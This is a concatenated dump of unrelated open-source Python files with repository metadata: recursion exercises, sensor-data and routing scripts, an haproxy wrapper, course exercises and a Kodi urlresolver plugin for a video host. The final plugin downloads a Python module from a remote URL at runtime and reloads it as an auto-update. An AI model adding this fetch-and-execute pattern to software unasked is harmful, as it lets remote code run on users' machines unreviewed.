e779e3f600b7e54b7c5baef503b79065bdc3cdb6
|
[
"MIT"
] | null | null | null |
Vorlesungsinhalte/2020-10-30_Rekursion.py
|
wwi20ama-programmierung/python-intro
|
e779e3f600b7e54b7c5baef503b79065bdc3cdb6
|
[
"MIT"
] | 2 |
2020-10-08T18:08:59.000Z
|
2020-10-29T19:53:34.000Z
|
# Compute an element of the Fibonacci sequence:
def fib(n):
if n == 0: # f(0) = 0
return 0
elif n == 1: # f(1) = 1
return 1
else: # f(n) = f(n-1) + f(n-2)
return fib (n-1) + fib (n-2)
# Compute the Ackermann function:
def ack(m,n):
if m == 0: # A(0,n) = n+1
return n+1
elif n == 0: # A(m,0) = A(m-1,1)
return ack(m-1,1)
else: # A(m,n) = A(m-1,A(m,n-1))
return ack(m-1, ack(m,n-1))
# Print the hailstone (Collatz) sequence:
def hailstone(n):
print(n)
if n!=1:
if n % 2 == 0:
hailstone(n//2)
else:
hailstone(3*n+1)
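# Example values (easy to verify by hand): fib(10) == 55, ack(2, 3) == 9,
# and hailstone(6) prints 6 3 10 5 16 8 4 2 1, one number per line.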
| 21.333333 | 42 | 0.489583 |
50eea60012772a0765204d19167397bd12493503
| 2,710 |
py
|
Python
|
processing/process_raw_json.py
|
MeteorologieHautnah/MeteorologieHautnah
|
1607c25b85753f31faccfd279abd503b83c1f4ea
|
[
"MIT"
] | 1 |
2022-02-17T08:24:13.000Z
|
2022-02-17T08:24:13.000Z
|
processing/process_raw_json.py
|
MeteorologieHautnah/MeteorologieHautnah
|
1607c25b85753f31faccfd279abd503b83c1f4ea
|
[
"MIT"
] | null | null | null |
processing/process_raw_json.py
|
MeteorologieHautnah/MeteorologieHautnah
|
1607c25b85753f31faccfd279abd503b83c1f4ea
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Process the raw json data
Creates an easy-to-read in csv file from the raw json file by cutting off the curl header.
Writes a log file.
usage: python process_raw_json.py [date=yyyymmdd]
*author*: Johannes Röttenbacher
"""
import sys
sys.path.append(".")
from meteohautnah.helpers import read_command_line_args, make_dir
import os
import datetime as dt
import pandas as pd
import logging
def preprocess_json(file: str) -> pd.DataFrame:
"""Preprocess raw json file
Cut of curl message and remove brackets.
:param file: Full file path
:return: pandas DataFrame
"""
with open(file, "r") as f:
data = f.readlines()[13:][0][1:-1]
df = pd.read_json(data, lines=True)
return df
# setup file logger
logdir = "/projekt_agmwend/home_rad/jroettenbacher/meteo_hautnah/logs"
logfile = f"{logdir}/process_raw_json.log"
logger = logging.getLogger(__name__)
handler = logging.FileHandler(logfile)
formatter = logging.Formatter('%(asctime)s : %(levelname)s - %(message)s', datefmt="%c")
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
# standard options
yesterday = dt.datetime.now() - dt.timedelta(days=1)
date_var = yesterday.strftime("%Y%m%d")
# read in command line args to overwrite standard options
args = read_command_line_args()
date_var = args["date"] if "date" in args else date_var
logger.info(f"Preprocessing {date_var}")
date_str = dt.datetime.strptime(date_var, "%Y%m%d").strftime("%Y-%m-%d")
indir = f"/projekt_agmwend2/data_raw/meteorologie_hautnah_raw/{date_str}"
outdir = f"/projekt_agmwend/data/meteorologie_hautnah/daily_csv"
files = os.listdir(indir) # list all files
if len(files) > 1:
df = pd.concat([preprocess_json(f"{indir}/{f}") for f in files]) # preprocess files and concatenate them
elif len(files) == 0:
logger.info(f"No data found for {date_str}")
sys.exit(1)
else:
df = preprocess_json(f"{indir}/{files[0]}")
df["lo"] = df["lo"].astype(str) # convert location column to string
df["lo"] = df["lo"].str.slice(1, -1) # slice of brackets
df[["lon", "lat"]] = df["lo"].str.split(', ', expand=True) # split location into lon and lat column
df.drop(["lo"], axis=1, inplace=True) # drop original location column
header = dict(a="altitude", H="humidity", s="speed", HDX="humidex", time="time", P="pressure", T0="air_temperature",
td="dewpoint", tag="device_id", L="luminocity", lon="lon", lat="lat")
df = df.rename(columns=header)
# reorder columns
df = df[[h for h in header.values()]]
outfile = f"{outdir}/{date_str}_meteotracker.csv"
df.to_csv(outfile, index=None) # save data to csv without an index column
logger.info(f"Saved {outfile}")
| 35.194805 | 116 | 0.708118 |
e8698df111a68f01d5c37731ccf036b2bec97361
| 1,883 |
py
|
Python
|
marathon/marathon-lb/haproxy_wrapper.py
|
smthkissinger/docker-images
|
35e868295d04fa780325ada4168381f1e80e8fe4
|
[
"BSD-3-Clause"
] | 63 |
2018-02-04T03:31:22.000Z
|
2022-03-07T08:27:39.000Z
|
marathon/marathon-lb/haproxy_wrapper.py
|
smthkissinger/docker-images
|
35e868295d04fa780325ada4168381f1e80e8fe4
|
[
"BSD-3-Clause"
] | 103 |
2017-10-28T02:25:41.000Z
|
2019-02-26T05:09:58.000Z
|
marathon/marathon-lb/haproxy_wrapper.py
|
smthkissinger/docker-images
|
35e868295d04fa780325ada4168381f1e80e8fe4
|
[
"BSD-3-Clause"
] | 40 |
2018-01-22T16:31:16.000Z
|
2022-03-08T04:40:42.000Z
|
#!/usr/bin/env python3
import os
import sys
import time
import errno
import logging
logger = logging.getLogger('haproxy_wrapper')
logger.setLevel(getattr(logging, 'DEBUG'))
formatter = logging.Formatter("%(asctime)-15s %(name)s: %(message)s")
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(formatter)
logger.addHandler(consoleHandler)
def create_haproxy_pipe():
logger.debug("create_haproxy_pipe called")
pipefd = os.pipe()
os.set_inheritable(pipefd[0], True)
os.set_inheritable(pipefd[1], True)
logger.debug("create_haproxy_pipe done")
return pipefd
def close_and_swallow(fd):
logger.debug("close_and_swallow called")
try:
os.close(fd)
logger.debug("close_and_swallow successful")
except OSError as e:
        # intentionally swallowed: the fd may already be closed
        logger.debug("close_and_swallow swallowed OSError: %s", e)
def wait_on_haproxy_pipe(pipefd):
logger.debug("wait_on_haproxy_pipe called")
try:
ret = os.read(pipefd[0], 1)
if len(ret) == 0:
close_and_swallow(pipefd[0])
close_and_swallow(pipefd[1])
logger.debug("wait_on_haproxy_pipe done (False)")
return False
except OSError as e:
logger.debug("wait_on_haproxy_pipe OSError: %s", e)
if e.args[0] != errno.EINTR:
close_and_swallow(pipefd[0])
close_and_swallow(pipefd[1])
logger.debug("wait_on_haproxy_pipe done (False)")
return False
logger.debug("wait_on_haproxy_pipe done (True)")
return True
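# Supervision flow (descriptive note): the parent creates an inheritable pipe,
# forks, and execs haproxy in the child with the write end exposed via
# HAPROXY_WRAPPER_FD. The parent closes its own write end and polls the read
# end; os.read() returning zero bytes (EOF) means every writer -- i.e. the
# haproxy process -- has exited, so the wrapper can exit as well.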
pipefd = create_haproxy_pipe()
pid = os.fork()
if not pid:
os.environ["HAPROXY_WRAPPER_FD"] = str(pipefd[1])
# Close the read side
os.close(pipefd[0])
os.execv(sys.argv[1], sys.argv[1:])
# Close the write side
os.close(pipefd[1])
while wait_on_haproxy_pipe(pipefd):
time.sleep(0.005)
sys.exit(0)
| 26.521127 | 69 | 0.671269 |
fa1a394f877b55fa9c7bcce4dc1d11c44c129af4
| 794 |
py
|
Python
|
hm/device.py
|
debauer/HomematicToInflux
|
233a837f0da031f331d771f0e6f7b55f488cd747
|
[
"MIT"
] | null | null | null |
hm/device.py
|
debauer/HomematicToInflux
|
233a837f0da031f331d771f0e6f7b55f488cd747
|
[
"MIT"
] | null | null | null |
hm/device.py
|
debauer/HomematicToInflux
|
233a837f0da031f331d771f0e6f7b55f488cd747
|
[
"MIT"
] | null | null | null |
class Device:
    def __init__(self, name, ise_id, address, device_type):
        self.name = name
        self.ise_id = ise_id
        self.address = address
        self.device_type = device_type
        # Assumption: channels is populated elsewhere; initialize it empty so
        # is_id_in_channels() cannot raise AttributeError on a fresh Device.
        self.channels = []
def get_name(self):
return self.name
def get_ise_id(self):
return self.ise_id
def get_address(self):
return self.address
def get_device_type(self):
return self.device_type
    def is_id_in_channels(self, ise_id):
        return ise_id in self.channels
def tostring(self):
return "device: {0:40} | ise_id: {1:4} | address: {2:14} | device_type: {3:10}".format(self.name, self.ise_id, self.address, self.device_type)
def __str__(self):
return self.tostring()
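# Hypothetical usage sketch (names are illustrative, not from the original):
# d = Device("Thermostat Wohnzimmer", "1234", "ABC0000001", "HM-CC-RT-DN")
# print(d)  # -> device: Thermostat Wohnzimmer ... | device_type: HM-CC-RT-DN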
| 25.612903 | 150 | 0.61335 |
0f190d6ef7fbc7028e6bb74b7c3cbf074ee64e4b
| 2,269 |
py
|
Python
|
03_TicTacToe/0 Arbeitsversion/tic_tac_toe_modell.py
|
kilian-funk/Python-Kurs
|
f5ef5a2fb2a875d2e80d77c1a6c3596a0e577d7f
|
[
"MIT"
] | null | null | null |
03_TicTacToe/0 Arbeitsversion/tic_tac_toe_modell.py
|
kilian-funk/Python-Kurs
|
f5ef5a2fb2a875d2e80d77c1a6c3596a0e577d7f
|
[
"MIT"
] | null | null | null |
03_TicTacToe/0 Arbeitsversion/tic_tac_toe_modell.py
|
kilian-funk/Python-Kurs
|
f5ef5a2fb2a875d2e80d77c1a6c3596a0e577d7f
|
[
"MIT"
] | null | null | null |
from enum import Enum
class Pos(Enum):
OBEN_LINKS = "oben links"
OBEN_MITTE = "oben mitte"
OBEN_RECHTS = "oben rechts"
MITTE_LINKS = "mitte links"
MITTE_MITTE = "mitte mitte"
MITTE_RECHTS = "mitte rechts"
UNTEN_LINKS = "unten links"
UNTEN_MITTE = "unten mitte"
UNTEN_RECHTS = "unten rechts"
class Belegung(Enum):
FREI = "Frei"
KREIS = "Kreis"
KREUZ = "Kreuz"
class Zustand(Enum):
OK = "Alles in Ordnung."
NICHT_ERLAUBT = "Der Zug ist nicht erlaubt."
KREUZ_GEWINNT = "Das Spiel ist beendet. Kreuz gewinnt!"
KREIS_GEWINNT = "Das Spiel ist beendet. Kreis gewinnt!"
UNENTSCHIEDEN = "Das Spiel ist beendet. Unentschieden!"
KREIS_IST_AM_ZUG = "Kreis ist am Zug."
KREUZ_IST_AM_ZUG = "Kreuz ist am Zug."
class TicTacToe:
def __init__(self, ausgabe):
self._ausgabe = ausgabe
self._ausgabe.zeichne_spielfeld()
self._spielfeld = { feld: Belegung.FREI for feld in Pos }
def setze(self, pos, symbol):
""" Setze ein Symbol (Belegung.KREUZ, Belegung.Kreis), wenn es die
Spielregeln erlauben. Speichere die Belegung des Spielfeldes,
rufe die entsprechende Ausgabe-Funktion auf und gib Zustand.OK oder
Zustand.NICHT_ERLAUBT zurück.
"""
return Zustand.OK
def pruefe_auf_unentschieden(self):
"""
Gibt True zurück, wenn die laufende Partie unentschieden zu ende
gegangen ist.
"""
return False
def pruefe_auf_gewonnen(self, symbol):
"""
Gibt True zurück, wenn das angefragte Symbol (Belegung.KREUZ oder
Belegung.Kreis) gewonnen hat.
"""
return False
def zustand(self):
"""
gibt zurück, in welchem Zustand sich das Spiel gerade befindet
(ein Element von Zustand, z. B. Zustand.KREUZ_IST_AM_ZUG)
"""
return Zustand.NICHT_ERLAUBT
def laeuft(self):
""" gibt True zurück, wenn das Spiel noch läuft, sonst False """
return self.naechster_zug() != None
def naechster_zug(self):
"""
gib Zustand.KREUZ_IST_AM_ZUG oder Zustand.KREIS_IST_AM_ZUG
oder None zurück
"""
return None
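# One possible sketch for pruefe_auf_gewonnen (an assumption, not part of the
# exercise skeleton): check the eight winning lines of the board, e.g.
#   linien = [(Pos.OBEN_LINKS, Pos.OBEN_MITTE, Pos.OBEN_RECHTS),
#             (Pos.OBEN_LINKS, Pos.MITTE_MITTE, Pos.UNTEN_RECHTS), ...]
#   return any(all(self._spielfeld[p] == symbol for p in linie)
#              for linie in linien)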
| 29.467532 | 75 | 0.622301 |
cbb9526226b658bbb982a45df025171999de12ba
| 550 |
py
|
Python
|
wagtail_localize/management/commands/sync_locale_trees.py
|
th3hamm0r/wagtail-localize
|
e9e0ba9245060c65e3247b62739abbed71bc2516
|
[
"BSD-3-Clause"
] | 123 |
2019-11-21T12:55:04.000Z
|
2022-03-23T08:08:47.000Z
|
wagtail_localize/management/commands/sync_locale_trees.py
|
th3hamm0r/wagtail-localize
|
e9e0ba9245060c65e3247b62739abbed71bc2516
|
[
"BSD-3-Clause"
] | 334 |
2019-11-20T10:40:08.000Z
|
2022-03-27T17:33:01.000Z
|
wagtail_localize/management/commands/sync_locale_trees.py
|
th3hamm0r/wagtail-localize
|
e9e0ba9245060c65e3247b62739abbed71bc2516
|
[
"BSD-3-Clause"
] | 41 |
2020-01-16T17:24:52.000Z
|
2022-03-28T13:09:59.000Z
|
from django.core.management.base import BaseCommand
from wagtail_localize.models import LocaleSynchronization
from wagtail_localize.synctree import PageIndex
class Command(BaseCommand):
help = "Synchronises the structure of all locale page trees so they contain the same pages. Creates alias pages where necessary."
def handle(self, **options):
page_index = PageIndex.from_database().sort_by_tree_position()
for locale_sync in LocaleSynchronization.objects.all():
locale_sync.sync_trees(page_index=page_index)
| 39.285714 | 133 | 0.78 |
38611f4a20238a311fb1421d35eaf1c368e17738
| 14,242 |
py
|
Python
|
Co-Simulation/Sumo/sumo-1.7.0/tools/route/implausibleRoutes.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 4 |
2020-11-13T02:35:56.000Z
|
2021-03-29T20:15:54.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/route/implausibleRoutes.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 9 |
2020-12-09T02:12:39.000Z
|
2021-02-18T00:15:28.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/route/implausibleRoutes.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 1 |
2020-11-20T19:31:26.000Z
|
2020-11-20T19:31:26.000Z
|
#!/usr/bin/env python
# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo
# Copyright (C) 2014-2020 German Aerospace Center (DLR) and others.
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# https://www.eclipse.org/legal/epl-2.0/
# This Source Code may also be made available under the following Secondary
# Licenses when the conditions for such availability set forth in the Eclipse
# Public License 2.0 are satisfied: GNU General Public License, version 2
# or later which is available at
# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html
# SPDX-License-Identifier: EPL-2.0 OR GPL-2.0-or-later
# @file implausibleRoutes.py
# @author Jakob Erdmann
# @date 2017-03-28
"""
Find routes that are implausible due to:
- being longer than the shortest path between the first and last edge
- being longer than the air-distance between the first and the last edge
The script computes an implausibility-score from configurable factors and
reports all routes above the specified threshold.
"""
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
from optparse import OptionParser
import subprocess
if 'SUMO_HOME' in os.environ:
sys.path.append(os.path.join(os.environ['SUMO_HOME'], 'tools'))
import sumolib # noqa
from sumolib.xml import parse, parse_fast_nested # noqa
from sumolib.net import readNet # noqa
from sumolib.miscutils import Statistics, euclidean, Colorgen # noqa
from route2poly import generate_poly # noqa
else:
sys.exit("please declare environment variable 'SUMO_HOME'")
def get_options():
USAGE = "Usage %prog [options] <net.xml> <rou.xml>"
optParser = OptionParser(usage=USAGE)
optParser.add_option("-v", "--verbose", action="store_true",
default=False, help="Give more output")
optParser.add_option("--threshold", type="float", default=2.5,
help="Routes with an implausibility-score above treshold are reported")
optParser.add_option("--airdist-ratio-factor", type="float", default=1, dest="airdist_ratio_factor",
help="Implausibility factor for the ratio of routeDist/airDist ")
optParser.add_option("--detour-ratio-factor", type="float", default=1, dest="detour_ratio_factor",
help="Implausibility factor for the ratio of routeDuration/shortestDuration ")
optParser.add_option("--detour-factor", type="float", default=0.01, dest="detour_factor",
help="Implausibility factor for the absolute detour time in (routeDuration-shortestDuration)" +
" in seconds")
optParser.add_option("--min-dist", type="float", default=0, dest="min_dist",
help="Minimum shortest-path distance below which routes are implausible")
optParser.add_option("--min-air-dist", type="float", default=0, dest="min_air_dist",
help="Minimum air distance below which routes are implausible")
optParser.add_option("--standalone", action="store_true",
default=False, help="Parse stand-alone routes that are not define as child-element of " +
"a vehicle")
optParser.add_option("--blur", type="float", default=0,
help="maximum random disturbance to output polygon geometry")
optParser.add_option("--ignore-routes", dest="ignore_routes",
help="List of route IDs (one per line) that are filtered when generating polygons and " +
"command line output (they will still be added to restrictions-output)")
optParser.add_option("--restriction-output", dest="restrictions_output",
help="Write flow-restriction output suitable for passing to flowrouter.py to FILE")
optParser.add_option("--od-restrictions", action="store_true", dest="odrestrictions",
default=False, help="Write restrictions for origin-destination relations rather than " +
"whole routes")
optParser.add_option("--edge-loops", action="store_true",
default=False, help="report routes which use edges twice")
optParser.add_option("--node-loops", action="store_true",
default=False, help="report routes which use junctions twice")
optParser.add_option("--threads", default=1, type=int,
help="number of threads to use for duarouter")
optParser.add_option("--min-edges", default=2, type=int,
help="number of edges a route needs to have to be analyzed")
optParser.add_option("--heterogeneous", action="store_true",
default=False, help="Use slow parsing for route files with different formats in one file")
optParser.add_option("--reuse-routing", action="store_true",
default=False, help="do not run duarouter again if output file exists")
options, args = optParser.parse_args()
if len(args) < 2:
sys.exit(USAGE)
options.network = args[0]
options.routeFiles = args[1:]
# options for generate_poly
options.layer = 100
options.geo = False
options.internal = False
options.spread = None
return options
class RouteInfo:
def __init__(self, route):
self.edges = route.edges.split()
def calcDistAndLoops(rInfo, net, options):
if net.hasInternal:
rInfo.airDist = euclidean(
net.getEdge(rInfo.edges[0]).getShape()[0],
net.getEdge(rInfo.edges[-1]).getShape()[-1])
else:
rInfo.airDist = euclidean(
net.getEdge(rInfo.edges[0]).getFromNode().getCoord(),
net.getEdge(rInfo.edges[-1]).getToNode().getCoord())
rInfo.length = sumolib.route.getLength(net, rInfo.edges)
rInfo.airDistRatio = rInfo.length / rInfo.airDist
rInfo.edgeLoop = False
rInfo.nodeLoop = False
if options.edge_loops:
seen = set()
for e in rInfo.edges:
if e in seen:
rInfo.edgeLoop = True
rInfo.nodeLoop = True
break
seen.add(e)
if options.node_loops and not rInfo.nodeLoop:
seen = set()
for e in rInfo.edges:
t = net.getEdge(e).getToNode()
if t in seen:
rInfo.nodeLoop = True
break
seen.add(t)
def addOrSkip(routeInfos, skipped, rid, route, min_edges):
ri = RouteInfo(route)
if len(ri.edges) >= min_edges:
routeInfos[rid] = ri
else:
skipped.add(rid)
def main():
options = get_options()
if options.verbose:
print("parsing network from", options.network)
net = readNet(options.network, withInternal=True)
read = 0
routeInfos = {} # id-> RouteInfo
skipped = set()
for routeFile in options.routeFiles:
if options.verbose:
print("parsing routes from", routeFile)
idx = 0
if options.standalone:
for idx, route in enumerate(parse(routeFile, 'route')):
if options.verbose and idx > 0 and idx % 100000 == 0:
print(idx, "routes read")
addOrSkip(routeInfos, skipped, route.id, route, options.min_edges)
else:
if options.heterogeneous:
for idx, vehicle in enumerate(parse(routeFile, 'vehicle')):
if options.verbose and idx > 0 and idx % 100000 == 0:
print(idx, "vehicles read")
addOrSkip(routeInfos, skipped, vehicle.id, vehicle.route[0], options.min_edges)
else:
prev = (None, None)
for vehicle, route in parse_fast_nested(routeFile, 'vehicle', 'id', 'route', 'edges'):
if prev[0] != vehicle.id:
if options.verbose and idx > 0 and idx % 500000 == 0:
print(idx, "vehicles read")
if prev[0] is not None:
addOrSkip(routeInfos, skipped, prev[0], prev[1], options.min_edges)
prev = (vehicle.id, route)
idx += 1
if prev[0] is not None:
addOrSkip(routeInfos, skipped, prev[0], prev[1], options.min_edges)
read += idx
if options.verbose:
print(read, "routes read", len(skipped), "short routes skipped")
if options.verbose:
print("calculating air distance and checking loops")
for idx, ri in enumerate(routeInfos.values()):
if options.verbose and idx > 0 and idx % 100000 == 0:
print(idx, "routes checked")
calcDistAndLoops(ri, net, options)
prefix = os.path.commonprefix(options.routeFiles)
duarouterOutput = prefix + '.rerouted.rou.xml'
duarouterAltOutput = prefix + '.rerouted.rou.alt.xml'
if os.path.exists(duarouterAltOutput) and options.reuse_routing:
if options.verbose:
print("reusing old duarouter file", duarouterAltOutput)
else:
if options.standalone:
duarouterInput = prefix
# generate suitable input file for duarouter
duarouterInput += ".vehRoutes.xml"
with open(duarouterInput, 'w') as outf:
outf.write('<routes>\n')
for rID, rInfo in routeInfos.items():
outf.write(' <vehicle id="%s" depart="0">\n' % rID)
outf.write(' <route edges="%s"/>\n' % ' '.join(rInfo.edges))
outf.write(' </vehicle>\n')
outf.write('</routes>\n')
else:
duarouterInput = ",".join(options.routeFiles)
command = [sumolib.checkBinary('duarouter'), '-n', options.network,
'-r', duarouterInput, '-o', duarouterOutput,
'--no-step-log', '--routing-threads', str(options.threads),
'--routing-algorithm', 'astar', '--aggregate-warnings', '1']
if options.verbose:
command += ["-v"]
if options.verbose:
print("calling duarouter:", " ".join(command))
subprocess.call(command)
for vehicle in parse(duarouterAltOutput, 'vehicle'):
if vehicle.id in skipped:
continue
routeAlts = vehicle.routeDistribution[0].route
if len(routeAlts) == 1:
routeInfos[vehicle.id].detour = 0
routeInfos[vehicle.id].detourRatio = 1
routeInfos[vehicle.id].shortest_path_distance = routeInfos[vehicle.id].length
else:
oldCosts = float(routeAlts[0].cost)
newCosts = float(routeAlts[1].cost)
assert(routeAlts[0].edges.split() == routeInfos[vehicle.id].edges)
routeInfos[vehicle.id].shortest_path_distance = sumolib.route.getLength(net, routeAlts[1].edges.split())
if oldCosts <= newCosts:
routeInfos[vehicle.id].detour = 0
routeInfos[vehicle.id].detourRatio = 1
if oldCosts < newCosts:
sys.stderr.write(("Warning: fastest route for '%s' is slower than original route " +
"(old=%s, new=%s). Check vehicle types\n") % (
vehicle.id, oldCosts, newCosts))
else:
routeInfos[vehicle.id].detour = oldCosts - newCosts
routeInfos[vehicle.id].detourRatio = oldCosts / newCosts
implausible = []
allRoutesStats = Statistics("overall implausiblity")
implausibleRoutesStats = Statistics("implausiblity above threshold")
for rID in sorted(routeInfos.keys()):
ri = routeInfos[rID]
ri.implausibility = (options.airdist_ratio_factor * ri.airDistRatio +
options.detour_factor * ri.detour +
options.detour_ratio_factor * ri.detourRatio +
max(0, options.min_dist / ri.shortest_path_distance - 1) +
max(0, options.min_air_dist / ri.airDist - 1))
allRoutesStats.add(ri.implausibility, rID)
if ri.implausibility > options.threshold or ri.edgeLoop or ri.nodeLoop:
implausible.append((ri.implausibility, rID, ri))
implausibleRoutesStats.add(ri.implausibility, rID)
# generate restrictions
if options.restrictions_output is not None:
with open(options.restrictions_output, 'w') as outf:
for score, rID, ri in sorted(implausible):
edges = ri.edges
if options.odrestrictions and len(edges) > 2:
edges = [edges[0], edges[-1]]
outf.write("0 %s\n" % " ".join(edges))
if options.ignore_routes is not None:
numImplausible = len(implausible)
ignored = set([r.strip() for r in open(options.ignore_routes)])
        implausible = [r for r in implausible if r[1] not in ignored]  # r is (score, rID, ri); filter on the route ID
print("Loaded %s routes to ignore. Reducing implausible from %s to %s" % (
len(ignored), numImplausible, len(implausible)))
# generate polygons
polyOutput = prefix + '.implausible.add.xml'
colorgen = Colorgen(("random", 1, 1))
with open(polyOutput, 'w') as outf:
outf.write('<additional>\n')
for score, rID, ri in sorted(implausible):
generate_poly(options, net, rID, colorgen(), ri.edges, outf, score)
outf.write('</additional>\n')
sys.stdout.write('score\troute\t(airDistRatio, detourRatio, detour, shortestDist, airDist, edgeLoop, nodeLoop)\n')
for score, rID, ri in sorted(implausible):
# , ' '.join(ri.edges)))
sys.stdout.write('%.7f\t%s\t%s\n' % (score, rID, (ri.airDistRatio, ri.detourRatio,
ri.detour, ri.shortest_path_distance,
ri.airDist, ri.edgeLoop, ri.nodeLoop)))
print(allRoutesStats)
print(implausibleRoutesStats)
if __name__ == "__main__":
main()
| 47.315615 | 120 | 0.605393 |
935986544d7fa5f97e0ea0b354b40da1e0387ffb
| 548 |
py
|
Python
|
books/PythonCleanCode/ch7_generator/generators_iteration_1.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
books/PythonCleanCode/ch7_generator/generators_iteration_1.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
books/PythonCleanCode/ch7_generator/generators_iteration_1.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
"""Clean Code in Python - Chapter 7: Using Generators
> The Interface for Iteration
* Distinguish between iterable objects and iterators
* Create iterators
"""
class SequenceIterator:
"""
>>> si = SequenceIterator(1, 2)
>>> next(si)
1
>>> next(si)
3
>>> next(si)
5
"""
def __init__(self, start=0, step=1):
self.current = start
self.step = step
def __next__(self):
value = self.current
self.current += self.step
return value
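# Note (not part of the original exercise): SequenceIterator implements
# __next__ but not __iter__, so it works with next() yet would raise
# TypeError in a for loop. A minimal sketch of the missing piece:
#     def __iter__(self):
#         return self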
| 19.571429 | 57 | 0.54927 |
87c953e4e28b7d3e284b81ba7e6e229224ba765d
| 406 |
py
|
Python
|
exercises/de/exc_03_09_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/de/exc_03_09_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/de/exc_03_09_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
from spacy.lang.de import German
from spacy.tokens import Token
nlp = German()
# Register the token extension "is_country" with default value False
____.____(____, ____=____)
# Process the text and set is_country to True for the token "Spanien"
doc = nlp("Ich wohne in Spanien.")
____ = True
# Print the text and the is_country attribute for all tokens
print([(____, ____) for token in doc])
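# One possible solution sketch (hedged; the blanks above are the exercise):
# Token.set_extension("is_country", default=False)
# doc[3]._.is_country = True
# print([(token.text, token._.is_country) for token in doc])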
| 27.066667 | 75 | 0.758621 |
3559aa09fb0b15bbb230391339a5ffef5d5e6c3a
| 95 |
py
|
Python
|
baccoapp/mysandwich/apps.py
|
msienkiewicz7/baccoapp
|
d647ca205fdf06fe57fda7b6db164ae7d3387dad
|
[
"MIT"
] | null | null | null |
baccoapp/mysandwich/apps.py
|
msienkiewicz7/baccoapp
|
d647ca205fdf06fe57fda7b6db164ae7d3387dad
|
[
"MIT"
] | null | null | null |
baccoapp/mysandwich/apps.py
|
msienkiewicz7/baccoapp
|
d647ca205fdf06fe57fda7b6db164ae7d3387dad
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class MysandwichConfig(AppConfig):
name = 'mysandwich'
| 15.833333 | 34 | 0.768421 |
356f93fee911c3897f7b17f23cd8b3dce5180c74
| 2,280 |
py
|
Python
|
repo/script.module.urlresolver/lib/urlresolver/plugins/speedvid.py
|
dbiesecke/dbiesecke.github.io
|
5894473591f078fd22d1cb33794c5e656ae9b8dd
|
[
"MIT"
] | 1 |
2017-11-26T18:18:46.000Z
|
2017-11-26T18:18:46.000Z
|
repo/script.module.urlresolver/lib/urlresolver/plugins/speedvid.py
|
dbiesecke/dbiesecke.github.io
|
5894473591f078fd22d1cb33794c5e656ae9b8dd
|
[
"MIT"
] | null | null | null |
repo/script.module.urlresolver/lib/urlresolver/plugins/speedvid.py
|
dbiesecke/dbiesecke.github.io
|
5894473591f078fd22d1cb33794c5e656ae9b8dd
|
[
"MIT"
] | 3 |
2019-09-30T19:52:05.000Z
|
2020-04-12T21:20:56.000Z
|
"""
OVERALL CREDIT TO:
t0mm0, Eldorado, VOINAGE, BSTRDMKR, tknorris, smokdpi, TheHighway
urlresolver XBMC Addon
Copyright (C) 2011 t0mm0
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os, speedvid_gmu
from urlresolver import common
from urlresolver.resolver import UrlResolver, ResolverError
logger = common.log_utils.Logger.get_logger(__name__)
logger.disable()
SV_SOURCE = 'https://raw.githubusercontent.com/jsergio123/gmus/master/speedvid_gmu.py'
SV_PATH = os.path.join(common.plugins_path, 'speedvid_gmu.py')
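# Auto-update note: get_media_url() below calls self._auto_update(SV_SOURCE,
# SV_PATH) and then reload(speedvid_gmu), so the resolver logic is re-fetched
# from GitHub at resolve time instead of being fixed at addon install time.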
class SpeedVidResolver(UrlResolver):
name = "SpeedVid"
domains = ['speedvid.net']
    pattern = r'(?://|\.)(speedvid\.net)/(?:embed-|p-)?([0-9a-zA-Z]+)'
def __init__(self):
self.net = common.Net()
def get_media_url(self, host, media_id):
try:
self._auto_update(SV_SOURCE, SV_PATH)
reload(speedvid_gmu)
web_url = self.get_url(host, media_id)
return speedvid_gmu.get_media_url(web_url, media_id)
except Exception as e:
logger.log_debug('Exception during %s resolve parse: %s' % (self.name, e))
raise
def get_url(self, host, media_id):
return self._default_get_url(host, media_id, 'http://www.{host}/embed-{media_id}.html')
@classmethod
def get_settings_xml(cls):
xml = super(cls, cls).get_settings_xml()
xml.append('<setting id="%s_auto_update" type="bool" label="Automatically update resolver" default="true"/>' % (cls.__name__))
xml.append('<setting id="%s_etag" type="text" default="" visible="false"/>' % (cls.__name__))
return xml
| 38.644068 | 134 | 0.679825 |